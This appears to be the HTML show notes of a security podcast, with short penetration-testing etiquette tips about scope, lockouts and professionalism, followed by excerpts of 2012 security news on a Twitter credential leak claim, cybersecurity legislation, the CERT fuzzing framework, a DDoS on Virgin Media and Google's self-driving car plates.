<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon:</span><img height="135px;" src="https://lh5.googleusercontent.com/YY6qFEGHm_X17e4YGj5m-wazzLOnEO7Kdr08OoqWCln7HJSXBKsJfizxQ9kZx5cCpH5-smBnlyVPJz_aMLFZBZcazhAl_1uFMNiZuAz-loPh-b7S6XU" width="135px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon UK:</span><img height="138px;" src="https://lh3.googleusercontent.com/G1W2KALnAtx5ThoXKTPustCzThAXopnBS532s0lvwQvQqf2euBwyU78mrTucWcYKxd3WHEKm1I06ZT6cjsYFFhzqKFk9chHzzImGli6agTht1fheIFY" width="138px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Pentest Lessons</span></p>
<ol style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you identify a vulnerability and the exploit can and most likely will result in a DoS. &nbsp;Don&rsquo;t try it without ensuring that DoS are allowed in the Statement of Work.</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you&rsquo;re going to perform brute-forcing, make sure that this allowed in the Statement of Work. &nbsp;Remember, a low threshold for account lockouts can result in you accidentally locking accounts by just simply using an nmap script or Nessus plugin.</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Watch you language! &nbsp;Swearing or cursing in front of a customer not only makes you look unprofessional, but it calls into question everything that you do.</span></p>
</li>
<li style="list-style-type:decimal;font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When traveling, often times the most difficult and stressful thing that you encounter is trying to get the customers site. &nbsp;Finding out that you don&rsquo;t have the Point of Contact (POC) name nor customer&rsquo;s address when you&rsquo;re driving is probably less than optimal. &nbsp;Always make sure that you have this information written down so that if something happens you can still get to where you need to go.</span></p>
</li>
</ol>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://mashable.com/2012/05/08/twitter-hacked-accounts/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://mashable.com/2012/05/08/twitter-hacked-accounts/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hackers claiming to be affiliated with the hacktivist group Anonymous claimed this week to have accessed and published the details of about 55,000 Twitter accounts.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But Twitter said Tuesday those claims are largely bogus, and that the group mostly posted duplicate information or username and password information for suspended spam accounts.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An anonymous Pastebin user posted five extremely long pages of alleged Twitter usernames and passwords to the text storage site on Monday. (Here are pages</span><a href="http://pastebin.com/Kc9ng18h"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> one</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://pastebin.com/vCMndK2L"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> two</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://pastebin.com/JdQkuYwG"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> three</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://pastebin.com/fw43srjY"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> four</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and</span><a href="http://pastebin.com/jv4LBjPX"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> five</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.) The hacking news aggregator Airdemon.net reported the supposed breach on Tuesday, beginning to fuel speculation around the web of a massive successful attack on Twitter&rsquo;s servers. Airdemon said celebrity accounts were among those compromised, and also claimed to have information from a &ldquo;Twitter insider&rdquo; confirming the attack.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Responding to a Mashable comment request Tuesday afternoon, however, a Twitter representative debunked the notion of a hugely successful breach but said the company is still investigating the situation.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The list of accounts posted to Pastebin contains more than 20,000 duplicates and information for many spam accounts that have already been suspended, a spokesperson told Mashable in an email. Furthermore, Twitter says, many of the usernames and passwords do not in fact appear to linked to one another, rendering them essentially useless.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Twitter has sent out password resets to accounts that may have been affected and encourages other concerned users to visit the network&rsquo;s</span><a href="https://support.twitter.com/articles/31796-my-account-has-been-compromised"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Help Center</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to change their passwords and review security settings.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://keranews.org/post/bill-would-have-businesses-foot-cost-cyber-war"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://keranews.org/post/bill-would-have-businesses-foot-cost-cyber-war</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Business executives and national security leaders are of one mind over the need to improve the security of the computers that control the U.S. power grid, the financial system, water treatment facilities and other elements of critical U.S. infrastructure. But they divide over the question of who bears responsibility for that effort.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The disagreement stands as an obstacle to passage of major cybersecurity legislation backed by Sens. Joe Lieberman of Connecticut and Susan Collins of Maine, among others.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many intelligence and security officials who worked under President George W. Bush, as well as those serving under President Obama, are backing stricter government regulation of cybersecurity, a key part of the</span><a href="http://www.hsgac.senate.gov/download/the-cybersecurity-act-of-2012-s-2105"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Lieberman-Collins legislation</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. Business leaders, however, generally oppose those provisions.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The major concern is the vast regulatory structure that would be set up at the Department of Homeland Security,&quot; says Larry Clinton, president of the Internet Security Alliance, an association of major U.S. companies with interests in the cybersecurity debate.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s a concern not shared by Stewart Baker, a top cybersecurity official in the Bush administration who says he generally holds pro-business and anti-regulation views. &quot;I see a big conflict between the desire to avoid regulation and the desire to protect national security,&quot; Baker says. &quot;I come down on the national security side of that debate.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.net-security.org/secworld.php?id=12894"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.net-security.org/secworld.php?id=12894</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The CERT</span><a href="http://www.cert.org/download/bff/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Basic Fuzzing Framework</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (BFF) is a software testing tool that finds defects in applications that run on the Linux and Mac OS X platforms.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BFF performs mutational fuzzing on software that consumes file input. It automatically collects test cases that cause software to crash in unique ways, as well as debugging information associated with the crashes.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The goal of BFF is to minimize the effort required for software vendors and security researchers to efficiently discover and analyze security vulnerabilities found via fuzzing.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Traditionally fuzzing has been very effective at finding security vulnerabilities, but because of its inherently stochastic nature results can be highly dependent on the initial configuration of the fuzzing system. BFF applies machine learning and evolutionary computing techniques to minimize the amount of manual configuration required to initiate and complete an effective fuzzing campaign.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BFF adjusts its configuration parameters based on what it finds (or does not find) over the course of a fuzzing campaign. By doing so it can dramatically increase both the efficacy and efficiency of the campaign. As a result, expert knowledge is not required to configure an effective fuzz campaign, and novices and experts alike can start finding and analyzing vulnerabilities very quickly.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some of the specific features BFF offers are:</span></p>
<ul style="margin-top:0pt;margin-bottom:0pt;">
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Minimal initial configuration is required to start a fuzzing campaign</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Minimal supervision of the fuzzing campaign is required, as BFF can automatically recover from many common problems that can interrupt fuzzing campaigns</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Uniqueness determination through intelligent backtrace analysis</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Automated test case minimization reduces the effort required to analyze results by distilling the test case to the minimal changes to the input data required to induce a specific crash</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Online machine learning applied to fuzzing parameter and input file selection to improve the efficacy of the campaign</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Distributed fuzzing support</span></p>
</li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Crash severity / exploitability triage.</span></p>
</li>
</ul>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.techworld.com/personal-tech/3356559/virgin-media-hacked-by-supporters-of-pirate-bay"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/personal-tech/3356559/virgin-media-hacked-by-supporters-of-pirate-bay</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Virgin Media suffered a DDoS (distributed denial of service) attack on its website at the hands of The Pirate Bay supporters yesterday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Virgin Media website was taken down during the DDoS attack, which lasted one hour from 5pm last night.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It is believed that the attack occurred as a protest against the internet service provider (ISP) blocking users&rsquo; access to the file-sharing website since 2 May, following a High Court order.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A Virgin Media spokesperson said: &ldquo;Our website, virginmedia.com, has been the subject of denial of service attacks so we took the site offline for a short period of time.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We&rsquo;re aware some groups are claiming the attacks are a result of the recent High Court order which requires ISPs to prevent access to the Pirate Bay.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It added: &ldquo;As a responsible ISP, Virgin Media complies with court orders, but we strongly believe that tackling the issue of copyright infringement needs compelling legal alternatives, giving consumers access to great content at the right price, to help change consumer behaviour.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On its Facebook page, The Pirate Bay has released a statement condemning the Virgin Media hack.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Seems like some random Anonymous groups have run a DDoS campaign against Virgin Media and some other sites,&rdquo; it said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We do NOT encourage these actions. We believe in the open and free internets, where anyone can express their views. Even if we strongly disagree with them and even if they hate us.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;So don&rsquo;t fight them using ugly methods. DDoS and blocks are both forms of censorship.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Instead, it suggested, fans of The Pirate Bay should protest by starting a tracker, arranging a manifestation or &ldquo;teaching friends the art of bittorent&rdquo;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://nakedsecurity.sophos.com/2012/05/09/google-gets-funky-new-license-plate-from-nevada-dmv"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2012/05/09/google-gets-funky-new-license-plate-from-nevada-dmv</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Department of Motor Vehicles (DMV) in Nevada, USA, has issued its first-ever official Autonomous Vehicle Testing number plates to a Google self-driving car.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The rego reads &infin;AU001, in yellow and white characters on a bright red background.</span><img height="184px;" src="https://lh5.googleusercontent.com/XR6f95B8aguw6mTMVimtzXpkBy7DAOHGE6QGSVdebqfZVsUJSSjTsDpH3WdX5Yp5teUKQMPv_jvMuSoyTNUA_gN8vkE6LJDkeRfcmuTq0ILFcpSKIvc" width="640px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to the</span><a href="http://www.dmvnv.com/news/12005-autonomous-vehicle-licensed.htm"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Nevada DMV</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, &quot;the infinity symbol was the best way to represent the &#39;car of the future.&#39;&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But that optimistic statement is offset in the DMV&#39;s press release by the additional observation that &quot;the unique red plate will be easily recognized by the public and law enforcement.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With that in mind, perhaps an exclamation point, or !, might have been a better choice than infinity?</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(Google would no doubt have objected. After all, the exclamation point is rather alarmingly known in British English as the &quot;shriek&quot;, and even more disturbingly in American English as the &quot;bang&quot;.)</span></p>
